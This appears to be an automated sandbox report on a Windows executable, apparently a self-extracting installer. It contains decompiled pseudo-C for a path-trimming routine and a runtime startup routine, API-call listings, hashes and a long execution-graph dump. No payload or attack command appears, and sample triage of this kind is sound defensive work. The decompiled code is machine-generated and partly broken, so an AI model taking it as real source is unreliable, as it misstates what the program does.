                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5601F272101619BBCB105FA9AC08DBB7B7CFB85360F100327FE01D3250E7719D6086A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E008D65E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}










APIs
• CharPrevA.USER32(?,00000000,00000000,00000001,00000000,008D2B33), ref: 008D6602
• CharPrevA.USER32(?,00000000), ref: 008D6612
• CharPrevA.USER32(?,00000000), ref: 008D6629
• CharNextA.USER32(00000000), ref: 008D6635
Memory Dump Source
• Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_file.jbxd
Similarity
• API ID: Char$Prev$Next
• String ID:
• API String ID: 3260447230-0
• Opcode ID: 884b1625b102f329b9426e1b823b737688282f441c70ad11587e0ecd96e0db11
• Instruction ID: 22851963f0eb7afda5e0cdd487f03f8a3e6705fd5f0b0b1fb211bedb60914c8f
• Opcode Fuzzy Hash: 884b1625b102f329b9426e1b823b737688282f441c70ad11587e0ecd96e0db11
• Instruction Fuzzy Hash: 56F02D310051546EDB361F28AC888BBBF9CFF97354B29036FE492C2201F6154D468661
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%
E008D69B0() {
	intOrPtr* _t4;
	intOrPtr* _t5;
	void* _t6;
	intOrPtr _t11;
	intOrPtr _t12;

	*0x8d81f8 = E008D6C70();
	__set_app_type(E008D6FBE(2));
	*0x8d88a4 = *0x8d88a4 | 0xffffffff;
	*0x8d88a8 = *0x8d88a8 | 0xffffffff;
	_t4 = __p__fmode();
	_t11 = *0x8d8528; // 0x0
	*_t4 = _t11;
	_t5 = __p__commode();
	_t12 = *0x8d851c; // 0x0
	*_t5 = _t12;
	_t6 = E008D7000();
	if (*0x8d8000 == 0) {
		__setusermatherr(E008D7000);
	}
	E008D71EF(_t6);
	return 0;
}









APIs
  • Part of subcall function 008D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 008D6FC5
• __set_app_type.MSVCRT ref: 008D69C2
• __p__fmode.MSVCRT ref: 008D69D8
• __p__commode.MSVCRT ref: 008D69E6
• __setusermatherr.MSVCRT ref: 008D6A07
Memory Dump Source
• Source File: 00000000.00000002.424209491.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true
• Associated: 00000000.00000002.424199074.00000000008D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424219842.00000000008D8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.424230927.00000000008DC000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8d0000_file.jbxd
Similarity
• API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
• String ID:
• API String ID: 1632413811-0
• Opcode ID: 3666fe17ae1c32bff1742379fc3df36c57d4eef66a9767289cc746ae968e1d87
• Instruction ID: 6e0196109e0cea677b09008524031022656eb5335c95e7c827730abc7be60a7a
• Opcode Fuzzy Hash: 3666fe17ae1c32bff1742379fc3df36c57d4eef66a9767289cc746ae968e1d87
• Instruction Fuzzy Hash: B9F0AC7054A705DFD758AB39FD0AA083B61FB04331B20471BE4A1C63F1DF7A8955CA12
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 28.7%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 962
Total number of Limit Nodes: 25
2576 a044b9 20 API calls 2574->2576 2577 a0468f 7 API calls 2575->2577 2578 a0518d 2576->2578 2579 a051c0 2577->2579 2578->2282 2733 a06298 2579->2733 2582 a051e1 2582->2282 2583 a044b9 20 API calls 2583->2578 2585 a0468f 7 API calls 2584->2585 2586 a055c7 LocalAlloc 2585->2586 2587 a055db 2586->2587 2588 a055fd 2586->2588 2589 a044b9 20 API calls 2587->2589 2590 a0468f 7 API calls 2588->2590 2591 a055ec 2589->2591 2592 a0560a 2590->2592 2593 a06285 GetLastError 2591->2593 2594 a05632 lstrcmpA 2592->2594 2595 a0560e 2592->2595 2620 a055f1 2593->2620 2597 a05645 2594->2597 2598 a0564b LocalFree 2594->2598 2596 a044b9 20 API calls 2595->2596 2601 a0561f LocalFree 2596->2601 2597->2598 2599 a05696 2598->2599 2600 a0565b 2598->2600 2602 a0589f 2599->2602 2605 a056ae GetTempPathA 2599->2605 2606 a05467 49 API calls 2600->2606 2601->2620 2603 a06517 24 API calls 2602->2603 2603->2620 2604 a06ce0 4 API calls 2607 a02f7e 2604->2607 2608 a056eb 2605->2608 2609 a056c3 2605->2609 2610 a05678 2606->2610 2607->2285 2607->2291 2614 a05717 GetDriveTypeA 2608->2614 2615 a0586c GetWindowsDirectoryA 2608->2615 2608->2620 2745 a05467 2609->2745 2613 a044b9 20 API calls 2610->2613 2610->2620 2613->2620 2618 a05730 GetFileAttributesA 2614->2618 2630 a0572b 2614->2630 2779 a0597d GetCurrentDirectoryA SetCurrentDirectoryA 2615->2779 2618->2630 2620->2604 2621 a0597d 34 API calls 2621->2630 2622 a05467 49 API calls 2622->2608 2624 a02630 21 API calls 2624->2630 2625 a057c1 GetWindowsDirectoryA 2625->2630 2626 a0658a CharPrevA 2627 a057e8 GetFileAttributesA 2626->2627 2628 a057fa CreateDirectoryA 2627->2628 2627->2630 2628->2630 2629 a05827 SetFileAttributesA 2629->2630 2630->2614 2630->2615 2630->2618 2630->2620 2630->2621 2630->2624 2630->2625 2630->2626 2630->2629 2631 a05467 49 API calls 2630->2631 2775 a06952 2630->2775 2631->2630 2633 a06268 2632->2633 2634 a06249 2632->2634 2636 a0597d 34 API calls 2633->2636 2635 a044b9 20 API calls 2634->2635 2637 a0625a 2635->2637 2638 a0625f 
2636->2638 2639 a06285 GetLastError 2637->2639 2640 a06ce0 4 API calls 2638->2640 2639->2638 2641 a03013 2640->2641 2641->2285 2641->2299 2644 a03b2d 2642->2644 2643 a03b72 2845 a04fe0 2643->2845 2644->2643 2645 a03b53 2644->2645 2647 a06517 24 API calls 2645->2647 2648 a03b70 2647->2648 2649 a06298 10 API calls 2648->2649 2650 a03b7b 2648->2650 2649->2650 2650->2305 2652 a02622 2651->2652 2653 a02583 2651->2653 2896 a024e0 GetWindowsDirectoryA 2652->2896 2655 a025e8 RegOpenKeyExA 2653->2655 2656 a0258b 2653->2656 2657 a025e3 2655->2657 2658 a02609 RegQueryInfoKeyA 2655->2658 2656->2657 2659 a0259b RegOpenKeyExA 2656->2659 2657->2307 2660 a025d1 RegCloseKey 2658->2660 2659->2657 2661 a025bc RegQueryValueExA 2659->2661 2660->2657 2661->2660 2663 a03bdb 2662->2663 2666 a03bec 2662->2666 2664 a0468f 7 API calls 2663->2664 2664->2666 2665 a03c03 memset 2665->2666 2666->2665 2667 a03d13 2666->2667 2669 a03d26 2666->2669 2670 a0468f 7 API calls 2666->2670 2674 a03fd7 2666->2674 2675 a03d7b CompareStringA 2666->2675 2676 a03fab 2666->2676 2680 a03f46 LocalFree 2666->2680 2681 a03f1e LocalFree 2666->2681 2685 a03cc7 CompareStringA 2666->2685 2696 a03e10 2666->2696 2904 a01ae8 2666->2904 2945 a0202a memset memset RegCreateKeyExA 2666->2945 2971 a03fef 2666->2971 2668 a044b9 20 API calls 2667->2668 2668->2669 2672 a06ce0 4 API calls 2669->2672 2670->2666 2673 a03f60 2672->2673 2673->2313 2674->2669 2995 a02267 2674->2995 2675->2666 2675->2674 2679 a044b9 20 API calls 2676->2679 2683 a03fbe LocalFree 2679->2683 2680->2669 2681->2666 2681->2674 2683->2669 2685->2666 2686 a03f92 2689 a044b9 20 API calls 2686->2689 2687 a03e1f GetProcAddress 2688 a03f64 2687->2688 2687->2696 2691 a044b9 20 API calls 2688->2691 2690 a03fa9 2689->2690 2692 a03f7c LocalFree 2690->2692 2693 a03f75 FreeLibrary 2691->2693 2694 a06285 GetLastError 2692->2694 2693->2692 2695 a03f8b 2694->2695 2695->2669 2696->2686 2696->2687 2697 a03f40 FreeLibrary 2696->2697 2698 a03eff FreeLibrary 2696->2698 2985 
a06495 2696->2985 2697->2680 2698->2681 2700 a0468f 7 API calls 2699->2700 2701 a03a55 LocalAlloc 2700->2701 2702 a03a6c 2701->2702 2703 a03a8e 2701->2703 2705 a044b9 20 API calls 2702->2705 2704 a0468f 7 API calls 2703->2704 2706 a03a98 2704->2706 2707 a03a7d 2705->2707 2708 a03ac5 lstrcmpA 2706->2708 2709 a03a9c 2706->2709 2710 a06285 GetLastError 2707->2710 2712 a03ada 2708->2712 2713 a03b0d LocalFree 2708->2713 2711 a044b9 20 API calls 2709->2711 2714 a02f64 2710->2714 2715 a03aad LocalFree 2711->2715 2716 a06517 24 API calls 2712->2716 2713->2714 2714->2278 2714->2285 2715->2714 2717 a03aec LocalFree 2716->2717 2717->2714 2719 a0628f 2718->2719 2719->2285 2721 a0468f 7 API calls 2720->2721 2722 a0417d LocalAlloc 2721->2722 2723 a04195 2722->2723 2724 a041a8 2722->2724 2725 a044b9 20 API calls 2723->2725 2726 a0468f 7 API calls 2724->2726 2727 a041a6 2725->2727 2728 a041b5 2726->2728 2727->2285 2729 a041c5 lstrcmpA 2728->2729 2730 a041b9 2728->2730 2729->2730 2731 a041e6 LocalFree 2729->2731 2732 a044b9 20 API calls 2730->2732 2731->2727 2732->2731 2734 a0171e _vsnprintf 2733->2734 2744 a062c9 FindResourceA 2734->2744 2736 a06353 2738 a06ce0 4 API calls 2736->2738 2737 a062cb LoadResource LockResource 2737->2736 2740 a062e0 2737->2740 2739 a051ca 2738->2739 2739->2582 2739->2583 2741 a06355 FreeResource 2740->2741 2742 a0631b FreeResource 2740->2742 2741->2736 2743 a0171e _vsnprintf 2742->2743 2743->2744 2744->2736 2744->2737 2746 a0548a 2745->2746 2764 a0551a 2745->2764 2805 a053a1 2746->2805 2748 a05581 2752 a06ce0 4 API calls 2748->2752 2751 a05495 2751->2748 2755 a054c2 GetSystemInfo 2751->2755 2756 a0550c 2751->2756 2757 a0559a 2752->2757 2753 a0553b CreateDirectoryA 2758 a05577 2753->2758 2759 a05547 2753->2759 2754 a0554d 2754->2748 2760 a0597d 34 API calls 2754->2760 2768 a054da 2755->2768 2761 a0658a CharPrevA 2756->2761 2757->2620 2769 a02630 GetWindowsDirectoryA 2757->2769 2762 a06285 GetLastError 2758->2762 2759->2754 2763 a0555c 2760->2763 
2761->2764 2765 a0557c 2762->2765 2763->2748 2767 a05568 RemoveDirectoryA 2763->2767 2816 a058c8 2764->2816 2765->2748 2766 a0658a CharPrevA 2766->2756 2767->2748 2768->2756 2768->2766 2770 a0265e 2769->2770 2771 a0266f 2769->2771 2773 a044b9 20 API calls 2770->2773 2772 a06ce0 4 API calls 2771->2772 2774 a02687 2772->2774 2773->2771 2774->2608 2774->2622 2776 a069a1 2775->2776 2777 a0696e GetDiskFreeSpaceA 2775->2777 2776->2630 2777->2776 2778 a06989 MulDiv 2777->2778 2778->2776 2780 a059bb 2779->2780 2781 a059dd GetDiskFreeSpaceA 2779->2781 2784 a044b9 20 API calls 2780->2784 2782 a05ba1 memset 2781->2782 2783 a05a21 MulDiv 2781->2783 2785 a06285 GetLastError 2782->2785 2783->2782 2786 a05a50 GetVolumeInformationA 2783->2786 2787 a059cc 2784->2787 2788 a05bbc GetLastError FormatMessageA 2785->2788 2789 a05ab5 SetCurrentDirectoryA 2786->2789 2790 a05a6e memset 2786->2790 2791 a06285 GetLastError 2787->2791 2792 a05be3 2788->2792 2794 a05acc 2789->2794 2793 a06285 GetLastError 2790->2793 2795 a059d1 2791->2795 2796 a044b9 20 API calls 2792->2796 2797 a05a89 GetLastError FormatMessageA 2793->2797 2801 a05b0a 2794->2801 2803 a05b20 2794->2803 2799 a06ce0 4 API calls 2795->2799 2798 a05bf5 SetCurrentDirectoryA 2796->2798 2797->2792 2798->2795 2800 a05c11 2799->2800 2800->2608 2802 a044b9 20 API calls 2801->2802 2802->2795 2803->2795 2828 a0268b 2803->2828 2809 a053bf 2805->2809 2806 a0171e _vsnprintf 2806->2809 2807 a0658a CharPrevA 2808 a053fa RemoveDirectoryA GetFileAttributesA 2807->2808 2808->2809 2810 a0544f CreateDirectoryA 2808->2810 2809->2806 2809->2807 2811 a05415 GetTempFileNameA 2809->2811 2810->2811 2812 a0543a 2810->2812 2811->2812 2813 a05429 DeleteFileA CreateDirectoryA 2811->2813 2814 a06ce0 4 API calls 2812->2814 2813->2812 2815 a05449 2814->2815 2815->2751 2817 a058d8 2816->2817 2817->2817 2818 a058df LocalAlloc 2817->2818 2819 a058f3 2818->2819 2820 a05919 2818->2820 2821 a044b9 20 API calls 2819->2821 2823 a0658a CharPrevA 2820->2823 2826 a05906 
2821->2826 2822 a06285 GetLastError 2827 a05534 2822->2827 2824 a05931 CreateFileA LocalFree 2823->2824 2825 a0595b CloseHandle GetFileAttributesA 2824->2825 2824->2826 2825->2826 2826->2822 2826->2827 2827->2753 2827->2754 2829 a026e5 2828->2829 2830 a026b9 2828->2830 2832 a026ea 2829->2832 2833 a0271f 2829->2833 2831 a0171e _vsnprintf 2830->2831 2834 a026cc 2831->2834 2835 a0171e _vsnprintf 2832->2835 2836 a026e3 2833->2836 2837 a0171e _vsnprintf 2833->2837 2838 a044b9 20 API calls 2834->2838 2840 a026fd 2835->2840 2839 a06ce0 4 API calls 2836->2839 2841 a02735 2837->2841 2838->2836 2842 a0276d 2839->2842 2843 a044b9 20 API calls 2840->2843 2844 a044b9 20 API calls 2841->2844 2842->2795 2843->2836 2844->2836 2846 a0468f 7 API calls 2845->2846 2847 a04ff5 FindResourceA LoadResource LockResource 2846->2847 2848 a05020 2847->2848 2860 a0515f 2847->2860 2849 a05057 2848->2849 2850 a05029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2848->2850 2864 a04efd 2849->2864 2850->2849 2853 a05060 2854 a044b9 20 API calls 2853->2854 2859 a05075 2854->2859 2855 a05110 FreeResource 2856 a0511d 2855->2856 2858 a0513a 2856->2858 2862 a044b9 20 API calls 2856->2862 2857 a044b9 20 API calls 2857->2859 2858->2860 2863 a0514c SendMessageA 2858->2863 2859->2855 2859->2856 2860->2648 2861 a0507c 2861->2857 2861->2859 2862->2858 2863->2860 2865 a04f4a 2864->2865 2866 a04fa1 2865->2866 2872 a04980 2865->2872 2868 a06ce0 4 API calls 2866->2868 2869 a04fc6 2868->2869 2869->2853 2869->2861 2873 a04990 2872->2873 2874 a049c2 lstrcmpA 2873->2874 2875 a049a5 2873->2875 2877 a04a0e 2874->2877 2879 a049ba 2874->2879 2876 a044b9 20 API calls 2875->2876 2876->2879 2877->2879 2883 a0487a 2877->2883 2879->2866 2880 a04b60 2879->2880 2881 a04b92 FindCloseChangeNotification 2880->2881 2882 a04b76 2880->2882 2881->2882 2882->2866 2884 a048a2 CreateFileA 2883->2884 2886 a04908 2884->2886 2887 a048e9 2884->2887 2886->2879 2887->2886 2888 a048ee 2887->2888 2891 a0490c 2888->2891 2892 a048f5 CreateFileA 
2891->2892 2894 a04917 2891->2894 2892->2886 2893 a04962 CharNextA 2893->2894 2894->2892 2894->2893 2895 a04953 CreateDirectoryA 2894->2895 2895->2893 2897 a02510 2896->2897 2898 a0255b 2896->2898 2900 a0658a CharPrevA 2897->2900 2899 a06ce0 4 API calls 2898->2899 2901 a02569 2899->2901 2902 a02522 WritePrivateProfileStringA _lopen 2900->2902 2901->2657 2902->2898 2903 a02548 _llseek _lclose 2902->2903 2903->2898 2905 a01b25 2904->2905 3009 a01a84 2905->3009 2907 a01b57 2908 a0658a CharPrevA 2907->2908 2910 a01b8c 2907->2910 2908->2910 2909 a066c8 2 API calls 2911 a01bd1 2909->2911 2910->2909 2912 a01d73 2911->2912 2913 a01bd9 CompareStringA 2911->2913 2915 a066c8 2 API calls 2912->2915 2913->2912 2914 a01bf7 GetFileAttributesA 2913->2914 2916 a01d53 2914->2916 2917 a01c0d 2914->2917 2918 a01d7d 2915->2918 2919 a01d64 2916->2919 2917->2916 2924 a01a84 2 API calls 2917->2924 2920 a01d81 CompareStringA 2918->2920 2921 a01df8 LocalAlloc 2918->2921 2922 a044b9 20 API calls 2919->2922 2920->2921 2930 a01d9b 2920->2930 2921->2919 2923 a01e0b GetFileAttributesA 2921->2923 2925 a01d6c 2922->2925 2926 a01e1d 2923->2926 2943 a01e45 2923->2943 2927 a01c31 2924->2927 2929 a06ce0 4 API calls 2925->2929 2926->2943 2928 a01c50 LocalAlloc 2927->2928 2934 a01a84 2 API calls 2927->2934 2928->2919 2931 a01c67 GetPrivateProfileIntA GetPrivateProfileStringA 2928->2931 2933 a01ea1 2929->2933 2930->2930 2935 a01dbe LocalAlloc 2930->2935 2937 a01cf8 2931->2937 2942 a01cc2 2931->2942 2933->2666 2934->2928 2935->2919 2938 a01de1 2935->2938 2939 a01d23 2937->2939 2940 a01d09 GetShortPathNameA 2937->2940 2941 a0171e _vsnprintf 2938->2941 2944 a0171e _vsnprintf 2939->2944 2940->2939 2941->2942 2942->2925 3015 a02aac 2943->3015 2944->2942 2946 a02256 2945->2946 2947 a0209a 2945->2947 2948 a06ce0 4 API calls 2946->2948 2950 a0171e _vsnprintf 2947->2950 2952 a020dc 2947->2952 2949 a02263 2948->2949 2949->2666 2951 a020af RegQueryValueExA 2950->2951 2951->2947 2951->2952 2953 a020e4 RegCloseKey 
2952->2953 2954 a020fb GetSystemDirectoryA 2952->2954 2953->2946 2955 a0658a CharPrevA 2954->2955 2956 a0211b LoadLibraryA 2955->2956 2957 a02179 GetModuleFileNameA 2956->2957 2958 a0212e GetProcAddress FreeLibrary 2956->2958 2960 a021de RegCloseKey 2957->2960 2962 a02177 2957->2962 2958->2957 2959 a0214e GetSystemDirectoryA 2958->2959 2961 a02165 2959->2961 2959->2962 2960->2946 2963 a0658a CharPrevA 2961->2963 2962->2962 2964 a021b7 LocalAlloc 2962->2964 2963->2962 2965 a021ec 2964->2965 2966 a021cd 2964->2966 2968 a0171e _vsnprintf 2965->2968 2967 a044b9 20 API calls 2966->2967 2967->2960 2969 a02218 RegSetValueExA RegCloseKey LocalFree 2968->2969 2969->2946 2972 a04016 CreateProcessA 2971->2972 2983 a04106 2971->2983 2973 a04041 WaitForSingleObject GetExitCodeProcess 2972->2973 2974 a040c4 2972->2974 2979 a04070 2973->2979 2976 a06285 GetLastError 2974->2976 2975 a06ce0 4 API calls 2977 a04117 2975->2977 2978 a040c9 GetLastError FormatMessageA 2976->2978 2977->2666 2981 a044b9 20 API calls 2978->2981 3042 a0411b 2979->3042 2981->2983 2982 a04096 CloseHandle CloseHandle 2982->2983 2984 a040ba 2982->2984 2983->2975 2984->2983 2986 a064c2 2985->2986 2987 a0658a CharPrevA 2986->2987 2988 a064d8 GetFileAttributesA 2987->2988 2989 a06501 LoadLibraryA 2988->2989 2990 a064ea 2988->2990 2992 a06508 2989->2992 2990->2989 2991 a064ee LoadLibraryExA 2990->2991 2991->2992 2993 a06ce0 4 API calls 2992->2993 2994 a06513 2993->2994 2994->2696 2996 a02381 2995->2996 2997 a02289 RegOpenKeyExA 2995->2997 2998 a06ce0 4 API calls 2996->2998 2997->2996 2999 a022b1 RegQueryValueExA 2997->2999 3002 a0238c 2998->3002 3000 a02374 RegCloseKey 2999->3000 3001 a022e6 memset GetSystemDirectoryA 2999->3001 3000->2996 3003 a02321 3001->3003 3004 a0230f 3001->3004 3002->2669 3006 a0171e _vsnprintf 3003->3006 3005 a0658a CharPrevA 3004->3005 3005->3003 3007 a0233f RegSetValueExA 3006->3007 3007->3000 3010 a01a9a 3009->3010 3012 a01aaf 3010->3012 3013 a01aba 3010->3013 3028 a0667f 3010->3028 
3012->3013 3014 a0667f 2 API calls 3012->3014 3013->2907 3014->3012 3016 a02ad4 GetModuleFileNameA 3015->3016 3017 a02be6 3015->3017 3027 a02b02 3016->3027 3018 a06ce0 4 API calls 3017->3018 3020 a02bf5 3018->3020 3019 a02af1 IsDBCSLeadByte 3019->3027 3020->2925 3021 a02b11 CharNextA CharUpperA 3023 a02b8d CharUpperA 3021->3023 3021->3027 3022 a02bca CharNextA 3024 a02bd3 CharNextA 3022->3024 3023->3027 3024->3027 3026 a02b43 CharPrevA 3026->3027 3027->3017 3027->3019 3027->3021 3027->3022 3027->3024 3027->3026 3033 a065e8 3027->3033 3029 a06689 3028->3029 3030 a066a5 3029->3030 3031 a06648 IsDBCSLeadByte 3029->3031 3032 a06697 CharNextA 3029->3032 3030->3010 3031->3029 3032->3029 3034 a065f4 3033->3034 3034->3034 3035 a065fb CharPrevA 3034->3035 3036 a06611 CharPrevA 3035->3036 3037 a0660b 3036->3037 3038 a0661e 3036->3038 3037->3036 3037->3038 3039 a0663d 3038->3039 3040 a06634 CharNextA 3038->3040 3041 a06627 CharPrevA 3038->3041 3039->3027 3040->3039 3041->3039 3041->3040 3043 a04132 3042->3043 3045 a0412a 3042->3045 3046 a01ea7 3043->3046 3045->2982 3047 a01ed3 3046->3047 3048 a01eba 3046->3048 3047->3045 3049 a0256d 15 API calls 3048->3049 3049->3047 3051 a01ff0 RegOpenKeyExA 3050->3051 3052 a02026 3050->3052 3051->3052 3053 a0200f RegDeleteValueA RegCloseKey 3051->3053 3052->2318 3053->3052 3119 a019e0 3120 a01a03 3119->3120 3121 a01a24 GetDesktopWindow 3119->3121 3123 a01a16 EndDialog 3120->3123 3124 a01a20 3120->3124 3128 a043d0 6 API calls 3121->3128 3123->3124 3126 a06ce0 4 API calls 3124->3126 3127 a01a7e 3126->3127 3129 a04463 SetWindowPos 3128->3129 3131 a06ce0 4 API calls 3129->3131 3132 a01a33 LoadStringA SetDlgItemTextA MessageBeep 3131->3132 3132->3124 3133 a06a20 __getmainargs 3134 a06bef _XcptFilter 3135 a069b0 3136 a069b5 3135->3136 3144 a06fbe GetModuleHandleW 3136->3144 3138 a069c1 __set_app_type __p__fmode __p__commode 3139 a069f9 3138->3139 3140 a06a02 __setusermatherr 3139->3140 3141 a06a0e 3139->3141 3140->3141 3146 a071ef _controlfp 
3141->3146 3143 a06a13 3145 a06fcf 3144->3145 3145->3138 3146->3143 3147 a034f0 3148 a03504 3147->3148 3166 a035b8 3147->3166 3150 a0351b 3148->3150 3151 a035be GetDesktopWindow 3148->3151 3148->3166 3149 a03526 3152 a0354f 3150->3152 3153 a0351f 3150->3153 3155 a043d0 11 API calls 3151->3155 3152->3149 3157 a03559 ResetEvent 3152->3157 3153->3149 3156 a0352d TerminateThread EndDialog 3153->3156 3154 a03671 EndDialog 3154->3149 3158 a035d6 3155->3158 3156->3149 3159 a044b9 20 API calls 3157->3159 3160 a035e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3158->3160 3161 a0361d SetWindowTextA CreateThread 3158->3161 3163 a03581 3159->3163 3160->3161 3161->3149 3162 a03646 3161->3162 3164 a044b9 20 API calls 3162->3164 3165 a0359b SetEvent 3163->3165 3167 a0358a SetEvent 3163->3167 3164->3166 3168 a03680 4 API calls 3165->3168 3166->3149 3166->3154 3167->3149 3168->3166 3169 a06ef0 3170 a06f2d 3169->3170 3172 a06f02 3169->3172 3171 a06f27 ?terminate@ 3171->3170 3172->3170 3172->3171 3173 a07270 _except_handler4_common 3054 a04cc0 GlobalFree 3055 a06f40 SetUnhandledExceptionFilter 3174 a04bc0 3176 a04c05 3174->3176 3177 a04bd7 3174->3177 3175 a04c1b SetFilePointer 3175->3177 3176->3175 3176->3177 3178 a030c0 3179 a030de CallWindowProcA 3178->3179 3180 a030ce 3178->3180 3181 a030da 3179->3181 3180->3179 3180->3181 3182 a063c0 3183 a06407 3182->3183 3184 a0658a CharPrevA 3183->3184 3185 a06415 CreateFileA 3184->3185 3186 a06448 WriteFile 3185->3186 3187 a0643a 3185->3187 3188 a06465 CloseHandle 3186->3188 3189 a06ce0 4 API calls 3187->3189 3188->3187 3191 a0648f 3189->3191 3192 a03100 3193 a031b0 3192->3193 3194 a03111 3192->3194 3195 a031b9 SendDlgItemMessageA 3193->3195 3196 a03141 3193->3196 3198 a03149 GetDesktopWindow 3194->3198 3200 a0311d 3194->3200 3195->3196 3197 a03138 EndDialog 3197->3196 3199 a043d0 11 API calls 3198->3199 3201 a0315d 6 API calls 3199->3201 3200->3196 3200->3197 3201->3196 3202 a04200 3203 a0420b SendMessageA 3202->3203 3204 a0421e 
3202->3204 3203->3204 3205 a06c03 3206 a06c17 _exit 3205->3206 3207 a06c1e 3205->3207 3206->3207 3208 a06c27 _cexit 3207->3208 3209 a06c32 3207->3209 3208->3209 3056 a04cd0 3057 a04cf4 3056->3057 3058 a04d0b 3056->3058 3059 a04d02 3057->3059 3060 a04b60 FindCloseChangeNotification 3057->3060 3058->3059 3062 a04dcb 3058->3062 3065 a04d25 3058->3065 3061 a06ce0 4 API calls 3059->3061 3060->3059 3064 a04e95 3061->3064 3063 a04dd4 SetDlgItemTextA 3062->3063 3066 a04de3 3062->3066 3063->3066 3065->3059 3079 a04c37 3065->3079 3066->3059 3084 a0476d 3066->3084 3069 a04e38 3069->3059 3071 a04980 25 API calls 3069->3071 3073 a04e56 3071->3073 3072 a04b60 FindCloseChangeNotification 3074 a04d99 SetFileAttributesA 3072->3074 3073->3059 3075 a04e64 3073->3075 3074->3059 3093 a047e0 LocalAlloc 3075->3093 3078 a04e6f 3078->3059 3080 a04c4c DosDateTimeToFileTime 3079->3080 3083 a04c88 3079->3083 3081 a04c5e LocalFileTimeToFileTime 3080->3081 3080->3083 3082 a04c70 SetFileTime 3081->3082 3081->3083 3082->3083 3083->3059 3083->3072 3102 a066ae GetFileAttributesA 3084->3102 3086 a0477b 3086->3069 3087 a047cc SetFileAttributesA 3089 a047db 3087->3089 3089->3069 3090 a06517 24 API calls 3091 a047b1 3090->3091 3091->3087 3091->3089 3092 a047c2 3091->3092 3092->3087 3094 a047f6 3093->3094 3095 a0480f LocalAlloc 3093->3095 3096 a044b9 20 API calls 3094->3096 3098 a04831 3095->3098 3101 a0480b 3095->3101 3096->3101 3099 a044b9 20 API calls 3098->3099 3100 a04846 LocalFree 3099->3100 3100->3101 3101->3078 3103 a04777 3102->3103 3103->3086 3103->3087 3103->3090 3104 a04ad0 3112 a03680 3104->3112 3107 a04ae9 3108 a04aee WriteFile 3109 a04b0f 3108->3109 3110 a04b14 3108->3110 3110->3109 3111 a04b3b SendDlgItemMessageA 3110->3111 3111->3109 3113 a03691 MsgWaitForMultipleObjects 3112->3113 3114 a036e8 3113->3114 3115 a036a9 PeekMessageA 3113->3115 3114->3107 3114->3108 3115->3113 3118 a036bc 3115->3118 3116 a036c7 DispatchMessageA 3117 a036d1 PeekMessageA 3116->3117 3117->3118 3118->3113 
